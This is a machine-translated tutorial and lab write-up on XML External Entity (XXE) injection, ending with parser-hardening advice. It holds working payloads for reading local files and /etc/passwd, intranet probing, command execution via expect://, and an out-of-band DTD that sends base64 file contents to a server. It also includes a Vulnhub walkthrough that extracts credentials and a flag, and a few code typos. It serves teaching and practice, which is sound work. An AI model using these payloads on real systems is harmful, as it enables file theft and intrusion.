Table of contents
xxe-lab shooting range login box xml data transmission test-detection discovery
CTF-Jarvis-OJ-Web-XXE security real question reproduction - data request format
CTF-Vulnhub-XXE security test reappearance-detection, utilization, expansion, actual combat
XXE Vulnerability Repair and Defense Solution-php,java,python-filtering and disabling
XML explanation
XML definition : XML is designed to transmit and store data. The XML document structure includes XML declarations, DTD document type definitions (optional), document elements, whose focus is on the content of the data, which separates data from HTML and is independent of software and Hardware information transmission tool.
XML vs. HTML:
1.XML is designed to transmit and store data, and the focus is on the content of the data. HTML is designed to display data, and the focus is on how the data looks.
2.XML is designed to transfer information. Whereas HTML is designed to display information.
XXE vulnerability
Full name: XML External Entity Injection
xml external entity injection vulnerability, the XXE vulnerability occurs when the application parses the xml input, and the loading of external entities is not prohibited, resulting in the loading of malicious external files
What are the hazards:
1.DOS attack
2. SSRF attack
3. Use the file protocol to read arbitrary files
4. Port detection
5. Execute system commands
The following are the protocols supported by some scripts
XML typical code
<!--XML 声明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义 note 元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义 to 元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义 from 元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义 head 元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义 body 元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
DTD
The role of DTD is to define the legal building blocks of XML documents. DTDs can be declared in XML documents or referenced externally.
Internal declaration DTD <!DOCTYPE root element[element declaration]> External declaration DTD <!DOCTYPE root element SYSTEM "file name"> <!DOCTYPE note SYSTEM "Note.dtd"> Or <!DOCTYPE root element PUBLIC "public_ID" "filename">
exploit
When it is confirmed that there is an XXE vulnerability, there is an input interface
For example: the xxe loophole in the pikachu shooting range
How to play - read files
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x>&xxe;</x>
//xxe为变量,读取test.txt,利用file协议,后面为文件所在位置
//输出出来How to play - intranet probe or attack intranet application (trigger vulnerability address)
hardly encountered in practical applications
Can determine whether the other party exists the file, and the port
prerequisite
- Intranet IP address
- open port
- There is xxe vulnerability
- Construct the vulnerability address
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.80.1:80/test.txt" >
]>
<x>&rabbit;</x>
//这里后面应该为文件,不能为网址How to play-RCE
The CASE is to execute the system command in the PHP environment where the expect extension is installed
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id" >
]>
<x>&xxe;</x>
How to play - import external entity DTD
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:80/evil2.dtd">
%file;
]>
<x>&send;</x>
//evil2.dtd
<!ENTITY send SYSTEM "file:///d:/test.txt">
relation
In the previous examples, the results were echoed
No echo - read file (local environment test)
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:80/evil2.dtd">
%dtd;
%send;
]>evil2.dtd
<!ENTITY % payload
"<!ENTITY % send SYSTEM 'http://127.0.0.1:80/?data=%file;'>"
>
%payload;//Equivalent to reading the file and putting it on the server at the address you specified, so the log is the log on the server you specified
Open the code where the pikachu shooting range xxe is located. The default is vul\xxe\xxe_1.php
Temporarily annotate the part where the arrow is located, which is equivalent to no echo
Open the apache configuration file httpd.conf, and remove the comments before the customlog
Open log_config_module in php extension
Open the access.log file
Perform base64 decryption to get the text content 5oiR54ix5ZCD55OcIQ==
Cancel the comment just now
Use: let the other party visit your website, generate a log to view
protocol - read file (bypass)
Reference article: CTF XXE - MustaphaMond - Blog Garden XML explanation, bypassing, etc.
<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>
xxe-lab shooting range login box xml data transmission test-detection discovery
Shooting range download address: https://github.com/c0ny1/xxe-lab
Example: php-xxe
How to detect: (burp capture send to spider input keyword crawl view) MIME type: XML
1. Data format type: If there is a <user>test</user><pass>Mikasa</pass> type found
If there is an echo, you can test it, just enter the tag to see if the corresponding value is echoed, such as <aa>dsdd<aa>, to see if dsdd is echoed 2. Capture the packet and find that the content-
type is text/xml or application/xml
3. Change the Content-Type value to see the return value
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/test.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
CTF-Jarvis-OJ-Web-XXE security real question reproduction - data request format
Change the Content-Type value to see the return value. The original data package: application/json is changed to: application/xml
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
CTF-Vulnhub-XXE security test reappearance-detection, utilization, expansion, actual combat
Scan IP and port -> scan probe directory -> packet capture probe xxe security -> use xxe to read source code -> flag points to the file -> base32 64 decryption ->
php run -> flag
Download address: https://download.vulnhub.com/xxe/XXE.zip
Download and decompress and run the .ovf file in vm to import it
(1) As shown in the figure, the state after setting up the environment is unknown for the time being
(2) The attack machine kali, check the ip
(3) Use nmap to scan the network segment, see suspicious IP, and find that port 80 is open
(4) The browser tries to access and succeeds
(5) Use the kali tool dirsearch to scan the directory of the website and find the sensitive file robots.txt
Download and use: kali install dirsearch tool and use
python3 dirsearch.py -u http://192.168.80.128 -e*
(6) Visit 192.168.159.223/robots.txt, find two sensitive files again, and visit them in turn
admin.php
Judging from the results of the above access, the xxe file can be accessed, but the admin.php file access fails, but the file exists, which must be tricky, let's first infiltrate the xxe page to see
1.burp packet capture
2. Construct the payload and successfully verify that there is XXE vulnerability injection
3. Because the admin.php file exists in the previous scan, but it cannot be accessed, we can use the XXE injection here to read the admin.php file. The structure is as shown in the figure, and the source code of admin.php is successfully read
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name SYSTEM "php://filter/read/convert.base64-encode/resource=admin.php">
]>
<root><name>&name;</name><password>1</password></root>
//使用php://filter/read/convert.base64-encode/resource=admin.php的好处就是不用考虑文件完整目录
4. base64 decoding
5. From the php source code, you can find out that there is another sensitive file, and you can log in through the obtained account administhebest and password. The password is encrypted with md5 and decrypted to admin@123 
6. Try to log in to /xxe/admin.php, click the flag
Because Burp found it in the xxe directory when capturing packets, so use xxe/admin.php when logging in
7. Finally get the flag website, and the access fails again, just use XML injection to get the source code again, as shown in the figure
base64 decryption
Through judgment, the encryption method here is base32, base32 decryption is used first, and then base64 decryption is used, and finally the path with flag is obtained
7. Access path, base64 decryption
8. Written in php language, php runs online to get the flag SAFCSP{xxe_is_so_easy}
xxe Security Vulnerability Automated Injection Script Tool-XXEinjector(Ruby)
https://github.com/enjoiz/XXEinjector
7. XXEinjector: A powerful automated XXE injection tool - bmjoker - 博客园
XXE Vulnerability Repair and Defense Solution-php,java,python-filtering and disabling
Method 1: Disable external entities
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf
=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
Method 2: Filter XML data submitted by users
过滤关键词:<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC
Reference article: Day 39 - WEB Vulnerabilities - XXE&XML Exploitation Detection Bypass Full Solution_IsecNoob's Blog-CSDN Blog
Vulnhub XXE shooting range reappears_Xianghua Blog-CSDN Blog_xxe Vulnerability Shooting Range